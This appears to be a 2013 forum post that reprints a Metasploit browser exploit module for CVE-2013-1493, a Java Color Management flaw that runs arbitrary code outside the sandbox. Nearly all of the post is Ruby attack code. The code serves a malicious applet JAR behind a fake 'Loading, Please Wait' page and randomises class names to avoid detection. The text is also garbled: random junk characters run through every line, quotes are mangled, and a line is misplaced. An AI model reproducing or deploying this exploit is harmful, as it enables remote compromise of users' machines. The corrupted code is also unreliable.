##6 R/ G+ ?0 D$ f
2 }; p3 M. M( g: y% b& B# This file is part of the Metasploit Framework and may be subject to' g( k# B% Q: j2 t, G' q: b( A
# redistribution and commercial restrictions. Please see the Metasploit/ h% I0 `" {6 R+ k
# web site for more information on licensing and terms of use." K( D* }, J# x: ^$ \4 R
# http://metasploit.com/$ Q; ^% O, i' C1 W$ } F8 }3 n
##9 I0 r9 O3 `- U O
require ‘msf/core’
+ e; o* N# h# v/ @( t) ?/ i8 Qrequire ‘rex’5 K9 w" b) ?% s! n
class Metasploit3 < Msf::Exploit::Remote8 t5 U0 o- b/ Y
Rank = NormalRanking
5 M+ u& G! a4 p+ Y6 Q! Minclude Msf::Exploit::Remote::HttpServer::HTML* o$ h- b, ^4 m, Q3 w
include Msf::Exploit::EXE
3 |: A9 A; k: l. Iinclude Msf::Exploit::Remote::BrowserAutopwn
* j" X6 O+ l. J: a7 g1 @8 aautopwn_info({ :javascript => false })6 v2 W) K+ K0 B2 J. j2 [
def initialize( info = {} )
! o/ X9 ~: |2 K8 s. t% nsuper( update_info( info,. |+ O) w+ ] ~0 I+ ^6 ]/ T. w
‘Name’ => ‘Java CMM Remote Code Execution’,
7 R1 K4 R, ~( P2 J2 t‘Description’ => %q{/ t& o' n% D! X$ E
This module abuses the Color Management classes from a Java Applet to run
[5 A+ o* F1 J4 C/ Z& karbitrary Java code outside of the sandbox as exploited in the wild in February
' R( i L% s; V# a( s [and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u411 z& v! l0 [# B9 Y W
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
5 W; t. {1 \9 L6 R+ ysystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
2 U6 R" o5 |# g Rwarning in order to run the malicious applet.) }6 f# R3 J8 j. B; @
},
. U; \, o: d, L1 G# }‘License’ => MSF_LICENSE,7 V% I% n* ~! l. u0 M5 W
‘Author’ =>
8 r4 t2 r o2 }2 l4 A! b'Unknown', # Vulnerability discovery and Exploit6 ]+ K6 p. |8 B
'juan vazquez' # Metasploit module (just ported the published exploit)
- I0 @% v2 l ?: Y0 W3 {% c],- R" p$ V; a6 S$ O: s# S$ K- u
‘References’ =>
c, s3 v" {" u* c) M& n0 f[
' @2 _* Z* i0 d[ 'CVE', '2013-1493' ],
1 W7 ~6 a# O* s5 W }+ b$ ][ 'OSVDB', '90737' ],
, k2 M' T( H3 T' ]" n[ 'BID', '58238' ],
2 A1 N* o6 S9 J' F" {* u& F1 N[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],; D$ j( I [; Q' `, M4 Q; q" B
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],3 Y1 e5 X0 w9 q+ [3 j
[ 'URL', 'http://pastie.org/pastes/6581034' ]4 F; N3 U3 k2 p1 D0 s
],
# g) \8 a. L2 {% @: F‘Platform’ => [ 'win', 'java' ],
4 s/ J; E* A7 B8 x0 Y+ g# N% x‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },6 ^* E r+ P, X+ N5 S$ ^& _
‘Targets’ =>: i/ M O0 I$ X& q, ^
[
2 V. M+ Z% I2 u[ 'Generic (Java Payload)',
) `6 D Q& s8 R3 z{
/ L1 Y! l) c7 {+ |; X'Platform' => 'java',% _0 c' W' ^- D
'Arch' => ARCH_JAVA
( O v F2 M6 T4 T}$ g/ i# w& } h V% C) i
],
$ S2 t7 j( X# }: D[ 'Windows x86 (Native Payload)',) f- R$ F( e; ^
{
& s9 C9 B! a. J0 h3 o% p'Platform' => 'win',' ]1 E) s+ | _, y) E: z
'Arch' => ARCH_X86: `" T5 j" g6 S$ `+ F& n6 D& I/ t1 q
}# `8 `2 k+ S& u" E' i! ~
]
& e/ A% K9 S& I],. Z3 `9 T+ E4 @7 i
‘‘DisclosureDate’ => ‘Mar 01 2013′+ ?: @* X/ Y( c, ?9 a
))2 k& J7 v4 e! ?
end2 T$ n: Y1 C! d/ t, Q/ n' D
def setup
# E5 N, N. D/ S) `path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
& F K4 f" K% \@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
0 i8 s2 G; f/ v! n( Tpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
$ r7 q3 ^6 z/ a( S/ F4 O" M@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }% m3 n' d/ x m; E$ y2 G
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
& h$ z. ]7 q K: x# G@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }! e. R6 u' @5 t v9 q; n5 T& w
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
( `2 i- H ]2 r% X, u, v5 n4 Y1 F@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }. ~: H# o, ~- A6 E) h# D! y
@init_class_name = rand_text_alpha(“Init”.length); x5 A" F5 q5 p+ b" @
@init_class.gsub!(“Init”, @init_class_name)8 `# {; E8 ~% ]9 S4 j+ Y0 x
super8 r8 ~( }4 n1 V: G" d, L( e
end, G# I1 K) N$ ~: D; `& u
def on_request_uri(cli, request)
1 \8 ]5 X( {+ {! ?: k; k5 Yprint_status(“handling request for #{request.uri}”)- p+ C/ m# p/ m
case request.uri7 d' l' V J- M) M% o# M: \" A; l4 Z' b
when /\.jar$/i4 ]1 p! F7 u7 u$ [, n: w3 C2 p8 _0 d$ f4 k
jar = payload.encoded_jar9 x( ~& A2 X8 p4 l, {. W
jar.add_file(“#{@init_class_name}.class”, @init_class)
, Q7 r* c. P, ^" H% R/ a% Bjar.add_file(“Leak.class”, @leak_class); q1 H$ Y: ~9 [2 i+ t" H* K
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)6 x' ?1 C. i# q! O9 ?% B+ |; s
jar.add_file(“MyColorSpace.class”, @color_space_class)+ ~+ Y8 S6 \& ~0 p7 w2 W
DefaultTarget’ => 1,
# M9 t0 K9 @/ W! _9 s- X" smetasploit_str = rand_text_alpha(“metasploit”.length): p: u% R5 C% O Z$ I. H7 m
payload_str = rand_text_alpha(“payload”.length)* y9 O4 r% |$ ? F4 G
jar.entries.each { |entry|
& U( q& A& k3 d' e3 s, yentry.name.gsub!(“metasploit”, metasploit_str)9 u1 q* ]9 E7 q, l2 D! y
entry.name.gsub!(“Payload”, payload_str)
5 ?' Y' Y. U( ^# _+ p! Sentry.data = entry.data.gsub(“metasploit”, metasploit_str)7 P- s1 h# G- Z4 p
entry.data = entry.data.gsub(“Payload”, payload_str)
- C9 ]. \0 x# P$ }# @3 R {, c}
# J$ _( f( V! \" i9 hjar.build_manifest, k3 A4 v( Z" Q5 |
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
0 U" |, ^& V2 M, Q, M! J7 wwhen /\/$/3 ]0 l+ o6 F# `+ \6 H2 X8 e
payload = regenerate_payload(cli)7 ^* f! F& o' Y: h
if not payload
. N" w% u0 q0 }! Zprint_error(“Failed to generate the payload.”)
. j I) }. u4 m# t9 isend_not_found(cli)
/ [! Y7 s2 h4 dreturn
$ H* o* @, r3 J1 X; y9 M6 hend
2 t; ^+ x7 u% x9 ~$ r' S4 Q, Esend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })6 m3 ^5 T4 f1 ?' \) Q+ {
else
8 k. {6 U5 _- {- ?send_redirect(cli, get_resource() + ‘/’, ”)5 E' _# ?. L3 V6 H* y% G* o" V! O
end, F/ s3 h6 c" z3 a
end
! b& i7 |& T1 U Kdef generate_html
8 k, D( l- U0 uhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
8 {( m+ y3 e0 M# v6 d, fhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|( T5 Y( A& x4 D% v; |" n; j3 U
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|7 Z- Q7 z( k/ N; o) r" C5 L% S
html += %Q|</applet></body></html>|) G8 O/ r: ^6 j9 R/ k4 ]. V
return html5 M5 w: y% B c
end1 I( _! B% X8 B% n6 U, |
end
! R. m* V- ]" \" ]% @. h9 g m: E2 vend9 ~% m* B0 d: T8 g7 v9 s0 ?6 p9 }' r
|
发表于 2013-4-4 17:31:17
收藏
支持
反对